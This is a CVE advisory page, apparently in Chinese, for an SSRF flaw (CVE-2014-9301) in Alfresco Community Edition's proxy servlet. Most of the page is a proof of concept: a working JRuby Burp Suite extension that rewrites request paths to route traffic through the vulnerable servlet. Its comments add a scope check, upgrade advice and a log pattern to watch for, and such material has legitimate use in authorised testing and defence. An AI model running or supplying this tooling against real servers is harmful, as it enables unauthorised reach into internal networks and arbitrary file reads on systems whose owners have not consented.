# CVE-2014-9301 Alfresco Community Edition before 5.0.a 任意文件讀取漏洞
==INFO==
Server-side request forgery (SSRF) vulnerability in the proxy servlet in Alfresco Community Edition before 5.0.a allows remote attackers to trigger outbound requests to intranet servers, conduct port scans, and read arbitrary files via a crafted URI in the endpoint parameter.
==POC==
require 'java'
java_import 'burp.IBurpExtender'
java_import 'burp.IHttpListener'
java_import 'burp.IMessageEditorController'
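# Burp Suite extension (JRuby) published with the CVE-2014-9301 write-up.
#
# It registers as an HTTP listener and rewrites the request line of outgoing
# requests so that their path is prefixed with the Alfresco proxy path learned
# from the Referer header of earlier requests.
#
# Review notes:
# * Rewriting is limited to URLs inside Burp's configured target scope, so
#   traffic to hosts outside the authorised test is never modified and the
#   learned proxy path is never sent to unrelated hosts.
# * The page states the affected range as Alfresco Community Edition before
#   5.0.a; upgrading past it is the remediation. On the server side, requests
#   to the proxy servlet whose `endpoint` parameter carries a URI are the
#   pattern to look for in access logs.
class BurpExtender
  include IBurpExtender, IHttpListener, IMessageEditorController

  # First Referer header value (up to the end of the line).
  REFERER_HEADER = /Referer: (.*)/
  # Splits a Referer into the proxy prefix (ending in ":<port>/") and the rest.
  PROXY_REFERER = /(\/alfresco\/.*:\d+\/)(.*)/

  # Plain accessors; none of these except @callbacks is assigned in this file.
  attr_reader :callbacks, :log, :requestViewer, :responseViewer
  attr_writer :currentlyDisplayedItem

  #
  # implement IBurpExtender
  #
  # Called by Burp when the extension is loaded.
  def registerExtenderCallbacks(callbacks)
    # Keep the callbacks object: the `callbacks` reader and the scope check
    # both need it (the original never stored it, so the reader returned nil).
    @callbacks = callbacks
    # obtain an extension helpers object
    @helpers = callbacks.getHelpers()
    # set our extension name
    callbacks.setExtensionName("Traffic redirector")
    # register ourselves as an HTTP listener
    callbacks.registerHttpListener(self)
  end

  #
  # implement IHttpListener
  #
  # Rewrites in-scope requests; responses and out-of-scope requests pass
  # through untouched. A separator line is printed for every message.
  def processHttpMessage(toolFlag, messageIsRequest, messageInfo)
    # only process requests
    return unless messageIsRequest
    # only touch targets the operator has placed in Burp's scope
    return unless in_scope?(messageInfo)

    raw = messageInfo.getRequest().to_s
    request_line = raw.lines.first.to_s

    # A request line that names the endpoint parameter resets the learned root.
    @root_path = nil if request_line.include?('endpoint')

    referer_value = raw[REFERER_HEADER, 1]
    parts = referer_value ? referer_value.scan(PROXY_REFERER).flatten : []
    root_path = parts.first
    relative_path = "/#{parts.last}"

    # Remember the proxy root (and the page path under it) whenever the
    # Referer supplies one that differs from what is already stored.
    if !root_path.nil? && (@root_path.nil? || @root_path.to_s != root_path)
      @root_path = root_path
      @relative_path = relative_path
    end

    puts "INSTANCE_ROOT_PATH: #{@root_path}"
    puts "Instance Relative_PATH: #{@relative_path}"
    puts "ROOT_PATH: #{root_path}"
    puts "Relative_PATH: #{relative_path}"
    puts request_line

    # No proxy root has been learned yet: the original went on to call
    # String#sub with a nil replacement and raised TypeError. Leave the
    # request unchanged instead.
    if @root_path.nil?
      puts "No proxy root path known; request left unchanged"
      return
    end

    new_req = raw.sub("/alfresco/", "/")
    if new_req.lines.first.to_s.count('/') < 3
      # Request line has a single path slash, so the path is resolved against
      # the directory of the page named in the Referer.
      print "Single dash "
      puts new_req.lines.first
      unless root_path == relative_path
        prefix = directory_prefix(@relative_path)
        # Block form inserts the text literally (no backslash interpretation).
        new_req = new_req.sub("/") { prefix } unless prefix.nil?
      end
    end
    new_req = new_req.sub("/") { @root_path }

    print "Final request "
    puts new_req
    messageInfo.setRequest(@helpers.stringToBytes(new_req))
  ensure
    puts '----------------------'
  end

  #
  # implement IMessageEditorController
  # this allows our request/response viewers to obtain details about the messages being displayed
  #
  # Each accessor returns nil when no item has been selected yet rather than
  # raising NoMethodError on a nil @currentlyDisplayedItem.
  def getHttpService()
    return nil if @currentlyDisplayedItem.nil?
    @currentlyDisplayedItem.getHttpService()
  end

  def getRequest()
    return nil if @currentlyDisplayedItem.nil?
    @currentlyDisplayedItem.getRequest()
  end

  def getResponse()
    return nil if @currentlyDisplayedItem.nil?
    @currentlyDisplayedItem.getResponse()
  end

  private

  # True when the request's URL is inside Burp's configured target scope.
  def in_scope?(messageInfo)
    url = @helpers.analyzeRequest(messageInfo).getUrl()
    @callbacks.isInScope(url)
  end

  # Returns +path+ with its last segment blanked ("/a/b" -> "/a/"), or nil
  # when there is no segment to drop (nil, "" or "/").
  def directory_prefix(path)
    segments = path.to_s.split("/")
    return nil if segments.empty?
    segments[-1] = ""
    segments.join('/')
  end
end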
© 版权声明
文章版权归作者所有,未经允许请勿转载。